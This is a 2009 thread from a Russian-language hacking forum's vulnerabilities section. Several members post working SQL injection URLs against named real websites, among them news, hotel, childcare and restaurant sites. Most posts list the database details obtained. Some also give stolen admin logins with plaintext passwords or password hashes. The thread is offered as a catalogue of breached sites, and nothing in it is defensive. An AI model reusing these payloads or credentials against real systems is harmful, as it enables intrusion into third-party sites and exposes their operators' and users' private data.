HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.04.2009, 14:23
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами: 9035873

Репутация: 317
По умолчанию

Код:
<<"АТН" Агенство Телевидения Новости>>
Код:
http://atn.kharkov.ua/gallery_view.php?idf=-17+union+select+1,2,unhex(hex(concat_ws(0x3a,username,user_password))),4,5,6,7,8+from+atn.forum_users+limit+1,1--+
db: 5.0.45-log
name_db: site
user: atn@localhost
os: portbld-freebsd5.4
-----------
table: admin
kol-vo: 5
log :jne
pass:jne21
email :jne@rs.com.ua
acess : 223
+limit+х,х--+
---------
table: forum_users
db: atn

log :ideatryFriema
pass :2b7c0e2fb517f2b9e3e53e0b03537c8b
+limit+х,х--+
---------------------------------------
---------------------------------------
<<"Гостинный комплекс "Пушкарская свобода">>
Код:
http://www.sloboda-gk.ru/news.php?id=-79+union+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8--+
db: 4.1.22-log
name_db: wwwslobodagkru
user: slobodag@localhost
os: portbld-freebsd6.2

Последний раз редактировалось farex; 11.04.2009 в 14:50.. Причина: добывил sql
 
Ответить с цитированием

  #2  
Старый 11.04.2009, 15:04
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
С нами: 9316980

Репутация: 12
По умолчанию

www.eureca.org

Код:
http://www.eureca.org/catalog/product.php?id=-17+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18
Версия - 4.1.22
Юзер - eureca1@localhost
БД - eureca1

Табличка юзеры

Код:
http://www.eureca.org/catalog/product.php?id=-17+union+select+1,2,3,4,5,6,concat_ws(0x3a,id,login,pass,mail),8,9,10,11,12,13,14,15,16,17,18+from+users
P.S. выводятся сразу все юзеры

Вход в юзеры
Код:
http://www.eureca.org/users/login
 
Ответить с цитированием

  #3  
Старый 11.04.2009, 16:47
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами: 9416045

Репутация: 126
По умолчанию

www.childcare.ie
Цитата:
http://www.childcare.ie/brochers.php?id=70&cmbCounty=32%09UNION%09SELECT%0 91,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F 2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35--
Database Version: 5.0.45-log
Database name: jamesla_childcare
User name: jamesla_wlor@web16.hosting365.ie
 
Ответить с цитированием

  #4  
Старый 11.04.2009, 16:57
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Код:
http://www.veganstockholm.se/lang_eng/eat.php?mode=seeOne&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
Database Version: 5.0.67
Database name: u0501141_a
User name: u0501141@www19.aname.net
 
Ответить с цитированием

  #5  
Старый 11.04.2009, 17:01
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами: 9035873

Репутация: 317
По умолчанию

<<"Модельное агенство Ренессанс Москва">>

Код:
http://www.renessans.ru/news_full.php?id=-508+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,0,1,2,3,4,5,6,7,8--+

db: 5.0.22
name_db: renes
users: renes@localhost
os: redhat-linux-gnu

table: users
type: A
log: admin
pass: $1$WE$fFPL1qCgvP8kQ5xlKUW3R/
name: EW
users
+limit+х,х--+

------------------------------
------------------------------

<<Международня выставка"ПИР">>

Код:
http://www.pir.ru/news_menu.php?ld=2&id=-6988+union+select+table_name+from+information_schema.columns+where+column_name+like+'password'
db: 5.1.26-rc
name_db: pir
user: pir@localhost
os: portbld-freebsd7.0

-=admin=-
log: odmin
pass: 1qazxsw2

Последний раз редактировалось farex; 11.04.2009 в 17:32..
 
Ответить с цитированием

  #6  
Старый 11.04.2009, 17:39
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Код:
http://www.thefalesteam.com/sell.php?ID=35+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12
Database Version: 4.1.15
Database name: fales
User name: fales_web@localhost
 
Ответить с цитированием

  #7  
Старый 11.04.2009, 18:34
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами: 9416045

Репутация: 126
По умолчанию


www.puckfair.ie

Цитата:
http://www.puckfair.ie/viewnews.php?id=151+UNION+SELECT+1,AES_DECRYPT(AES _ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x 2F2A2A2F,User()),0x71),0x71),3,4,5--
5.0.45-community-log/**/splashg_puck/**/splashg_puck@web3.hosting365.ie

admin:$P$9RhCyg93wapcdaH7omGeUhIYb5gctX/
 
Ответить с цитированием

  #8  
Старый 11.04.2009, 18:57
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами: 9035873

Репутация: 317
По умолчанию

<<Ресторанные заметки>>

Код:
http://www.resto.kharkov.ua/user.php?id=-1028+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os)--+
db :5.0.51a-15-log
name_db: restox
user: u_restox@localhost
os: debian-linux-gnu
 
Ответить с цитированием

  #9  
Старый 11.04.2009, 21:25
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами: 9035873

Репутация: 317
По умолчанию

<<ИнформоЭКСПО - Информационное выставочное агенство>>

Код:
http://www.informexpo.ru/new/view_content.php?id=-1612'+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6--+
db: 5.0.77-Max-log
name_db: udachax7_main
user: udachax7_main@c4-w.ht-systems.ru
os: unknown-linux-gnu
 
Ответить с цитированием

  #10  
Старый 11.04.2009, 21:37
svesve
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
С нами: 9950786

Репутация: 214


По умолчанию

http://ghosty.ru
Код:
http://ghosty.ru/meet.php?mid=17+UNION+SELECT+1,2,3,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),5,6+LIMIT+1,1--
Database Version: 4.1.22
Database name: ghosty_smart
User name: ghosty_smart@212.193.238.136
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.